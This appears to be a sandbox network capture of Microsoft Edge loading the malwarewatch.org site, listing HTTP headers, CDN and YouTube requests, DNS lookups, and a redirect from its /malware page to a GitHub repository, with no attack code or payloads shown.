sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/styles/styles.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 19307
last-modified: Sat, 06 Mar 2021 16:18:42 GMT
etag: "6043ab62-4b6b"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Eq1DVDOzl40vlsV%2F0eVM7jZvZWDvipWVhThTDXm1cXYx9N16lzM6JH6PpC6QtxkfTJjxWLt5k8ZsrSXAVSpz3SUk8bRt2uV4j4HJCbCGA3EqAEB8xZQBiY%2Be6XF%2BaB39%2BIeq%2F1vdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1135e52eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=223&recv=32&lost=0&retrans=0&sent_bytes=268203&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=71252&cid=28a8e2741a2c414b&ts=641&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/assets/video_feed/peek.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/styles/styles.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 5007
last-modified: Sun, 21 Feb 2021 17:37:54 GMT
etag: "60329a72-138f"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W17sLG9oypMpz6VpLf2KwgEefDit%2BOlmlqqQnwDGeAnNxz%2BTKt55UdoNoOL%2BbuhtUFkNPp2ynaJXu8sc01r%2BQ4izpM2LRgpB%2Fc%2BdI2CJI3l8LQJHmqXyx6vu83rSKZnHdcYAxOjTRw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e11eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=228&recv=32&lost=0&retrans=0&sent_bytes=274319&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=65136&cid=28a8e2741a2c414b&ts=654&x=0"
-
Remote address:104.21.96.1:443RequestGET /video_list.html HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Thu, 30 Jan 2025 22:00:04 GMT
vary: Accept-Encoding
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ava9pzOlMP%2F9pR1r%2B578s93JWf4SBexYRu%2BMAy5AV2UIvdcqiLnYd3oneShtexcm0SvET0A%2BJOuLtfsw4Ne%2BCIHjFOCaGsVTb182i5%2FuaO9PxsalhamEV4EfwgJ8hXrL%2BDueNhiJqA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c113ef99eff1-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53852&min_rtt=47003&rtt_var=164&sent=325&recv=322&lost=0&retrans=0&sent_bytes=391298&recv_bytes=3046&delivery_rate=5760460&cwnd=428&unsent_bytes=0&cid=28a8e2741a2c414b&ts=761&x=0"
-
Remote address:104.21.96.1:443RequestGET /andrew_video_list.html HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Thu, 30 Jan 2025 22:00:04 GMT
vary: Accept-Encoding
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=My1aJRFQP2kfck7gwG90wVkA6cxmUS4KsTBEGlViQKnqjy%2FwHL1iRBdTSI7GiSmDj88ALq9TQimCcd2oj5QG6lczOGWNlco%2F5h9H3975tPLM26o0HWofyTGEGGs3uRJP24XuJSlbZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c113ef9aeff1-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53852&min_rtt=47003&rtt_var=164&sent=328&recv=322&lost=0&retrans=0&sent_bytes=393131&recv_bytes=3046&delivery_rate=5760460&cwnd=428&unsent_bytes=0&cid=28a8e2741a2c414b&ts=763&x=0"
-
Remote address:104.21.96.1:443RequestGET /malware HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html, application/xhtml+xml
turbolinks-referrer: https://www.malwarewatch.org/
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
content-type: text/html
location: https://github.com/Endermanch/MalwareDatabase
server: cloudflare
cf-cache-status: DYNAMIC
cf-ray: 90a4c11c1f06eff1-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.96.1:443RequestGET /images/favicon.ico?v=1.1 HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/malware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/x-icon
content-length: 85575
last-modified: Sat, 31 Jan 2009 07:07:38 GMT
etag: "4983f8ba-14e47"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 18210
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GjoRlVpNg9bQUpscqWHOkZxY12Pj0aieGTOuj2n3qTuyAouzeBc12wfUKPccRF00JtcSXjC4HB3VBnLP9niJRNcWfe7vmkbyZg9ftTi%2BcdO4V33nPiKq1wA7Ob7WDsWBnyVEQ%2BSQ5g%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c11f5fc6eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=59504&min_rtt=47003&rtt_var=15089&sent=337&recv=330&lost=0&retrans=0&sent_bytes=396091&recv_bytes=3266&delivery_rate=5760460&cwnd=438&unsent_bytes=0&cid=28a8e2741a2c414b&ts=2555&x=0"
-
Remote address:104.21.96.1:443RequestGET /malware HTTP/2.0
host: www.malwarewatch.org
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.malwarewatch.org/malware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
content-type: text/html
location: https://github.com/Endermanch/MalwareDatabase
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLG0vLeCZPKk0fcfUZXwU02UboLkCjDwsGAOzMSkAC8%2FJ3Thw2kxPUvrlp%2FeeXcefbBnidGhWXL0BlpLvAArLjGR0IRJrSsWTV%2B8YXdBBcltpAz6gy9%2B3PR4fS8ZxyEpfV3pLsxD1g%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c11f780ceff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49883&min_rtt=47003&rtt_var=687&sent=405&recv=395&lost=0&retrans=0&sent_bytes=482487&recv_bytes=3349&delivery_rate=5760460&cwnd=504&unsent_bytes=0&cid=28a8e2741a2c414b&ts=2611&x=0"
-
Remote address:8.8.8.8:53Requestunpkg.comIN AResponseunpkg.comIN A104.17.248.203unpkg.comIN A104.17.247.203unpkg.comIN A104.17.249.203unpkg.comIN A104.17.245.203unpkg.comIN A104.17.246.203
-
Remote address:104.17.248.203:443RequestGET /turbolinks@5.2.0/dist/turbolinks.js HTTP/2.0
host: unpkg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
access-control-allow-origin: *
content-encoding: br
cache-control: public, max-age=31536000
last-modified: Mon, 20 Aug 2018 15:25:05 GMT
etag: "9677-RSXIDDv/hCTf9IZ4edgduBKMcEo"
via: 1.1 fly.io
fly-request-id: 01JFECGNAEBW6XXECJCXD0ZV29-lhr
cf-cache-status: HIT
age: 3698692
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 90a4c1124ce14149-LHR
-
Remote address:8.8.8.8:53Requestuse.fontawesome.comIN AResponseuse.fontawesome.comIN CNAMEuse.fontawesome.com.cdn.cloudflare.netuse.fontawesome.com.cdn.cloudflare.netIN A104.21.27.152use.fontawesome.com.cdn.cloudflare.netIN A172.67.142.245
-
Remote address:104.21.27.152:443RequestGET /releases/v5.15.2/css/all.css HTTP/2.0
host: use.fontawesome.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
cache-control: max-age=31556926
etag: W/"c4af24ce595437830af0a401897698b2"
last-modified: Fri, 22 Sep 2023 01:45:20 GMT
vary: Accept-Encoding
cf-cache-status: HIT
age: 749194
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSb%2F0o3i66e%2Foc6BM5y64mqstPhDnZcjDFQ24Vet6iqJjguy0apcMnVVmHRXHhMxTBKtmn4Xn2PFLMYqB2tIcKDb4fE62rUymsg91qXsUCFhSNpDJihaLMbLP%2BC4ThPwKRt20VAQ"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c11298366383-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47867&min_rtt=47773&rtt_var=18104&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1062&delivery_rate=55923&cwnd=251&unsent_bytes=0&cid=3b91918b37a852c8&ts=73&x=0"
-
Remote address:8.8.8.8:53Request14.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.96.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request152.27.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request203.248.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request234.16.217.172.in-addr.arpaIN PTRResponse234.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f101e100net234.16.217.172.in-addr.arpaIN PTRmad08s04-in-f10�I
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A172.217.169.46youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.169.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A216.58.212.238youtube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A216.58.213.14youtube-ui.l.google.comIN A216.58.204.78
-
Remote address:142.250.187.238:443RequestGET /embed/TUzn_Qo3B3Y HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.238:443RequestGET /s/player/1080ef44/www-player.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/embed/TUzn_Qo3B3Y
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.238:443RequestGET /s/player/1080ef44/player_ias.vflset/en_US/embed.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/embed/TUzn_Qo3B3Y
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://www.youtube.com/s/player/1080ef44/www-embed-player.vflset/www-embed-player.jsmsedge.exeRemote address:142.250.187.238:443RequestGET /s/player/1080ef44/www-embed-player.vflset/www-embed-player.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/embed/TUzn_Qo3B3Y
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.238:443RequestGET /s/player/1080ef44/player_ias.vflset/en_US/base.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/embed/TUzn_Qo3B3Y
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requesti.ytimg.comIN AResponsei.ytimg.comIN A216.58.212.214i.ytimg.comIN A216.58.201.118i.ytimg.comIN A172.217.169.54i.ytimg.comIN A172.217.16.246i.ytimg.comIN A216.58.213.22i.ytimg.comIN A142.250.200.22i.ytimg.comIN A142.250.180.22i.ytimg.comIN A172.217.169.22i.ytimg.comIN A216.58.204.86i.ytimg.comIN A142.250.200.54i.ytimg.comIN A142.250.187.214i.ytimg.comIN A142.250.187.246i.ytimg.comIN A142.250.179.246i.ytimg.comIN A142.250.178.22
-
Remote address:216.58.212.214:443RequestGET /vi/-_uBdXbSSgc/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.214:443RequestGET /vi/pwre8oHZdL4/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.214:443RequestGET /vi/jKaajAgnHDg/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.214:443RequestGET /vi/kYVlULPFHsM/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.214:443RequestGET /vi/CQRVpbBESMA/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.212.214:443RequestGET /vi/9jCGXIJatwQ/maxresdefault.jpg HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A142.250.187.194
-
Remote address:8.8.8.8:53Request67.204.58.216.in-addr.arpaIN PTRResponse67.204.58.216.in-addr.arpaIN PTRlhr48s49-in-f31e100net67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f3�G67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f67�G
-
Remote address:8.8.8.8:53Request238.187.250.142.in-addr.arpaIN PTRResponse238.187.250.142.in-addr.arpaIN PTRlhr25s34-in-f141e100net
-
Remote address:8.8.8.8:53Request214.212.58.216.in-addr.arpaIN PTRResponse214.212.58.216.in-addr.arpaIN PTRams16s21-in-f221e100net214.212.58.216.in-addr.arpaIN PTRlhr25s27-in-f22�I214.212.58.216.in-addr.arpaIN PTRams16s21-in-f214�I
-
Remote address:8.8.8.8:53Request4.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:142.250.187.194:443RequestGET /pagead/id HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.youtube.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestjnn-pa.googleapis.comIN AResponsejnn-pa.googleapis.comIN A142.250.180.10jnn-pa.googleapis.comIN A142.250.187.202jnn-pa.googleapis.comIN A172.217.169.42jnn-pa.googleapis.comIN A142.250.179.234jnn-pa.googleapis.comIN A142.250.200.10jnn-pa.googleapis.comIN A216.58.212.202jnn-pa.googleapis.comIN A216.58.213.10jnn-pa.googleapis.comIN A142.250.187.234jnn-pa.googleapis.comIN A142.250.178.10jnn-pa.googleapis.comIN A216.58.201.106jnn-pa.googleapis.comIN A172.217.169.74jnn-pa.googleapis.comIN A172.217.16.234jnn-pa.googleapis.comIN A216.58.212.234jnn-pa.googleapis.comIN A216.58.204.74jnn-pa.googleapis.comIN A142.250.200.42
-
Remote address:8.8.8.8:53Requeststatic.doubleclick.netIN AResponsestatic.doubleclick.netIN A216.58.212.198
-
Remote address:8.8.8.8:53Requestyt3.ggpht.comIN AResponseyt3.ggpht.comIN CNAMEphotos-ugc.l.googleusercontent.comphotos-ugc.l.googleusercontent.comIN A216.58.212.225
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A216.58.204.68
-
Remote address:142.250.180.10:443RequestOPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://yt3.ggpht.com/7hrPouLW5CYi764J4yb-urMdfZ2tF9CKWHLHfaggAzYLF-X105xCjpgnShfKSCST5GBFV8EI2BY=s68-c-k-c0x00ffffff-no-rjmsedge.exeRemote address:216.58.212.225:443RequestGET /7hrPouLW5CYi764J4yb-urMdfZ2tF9CKWHLHfaggAzYLF-X105xCjpgnShfKSCST5GBFV8EI2BY=s68-c-k-c0x00ffffff-no-rj HTTP/2.0
host: yt3.ggpht.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:216.58.204.68:443RequestGET /js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
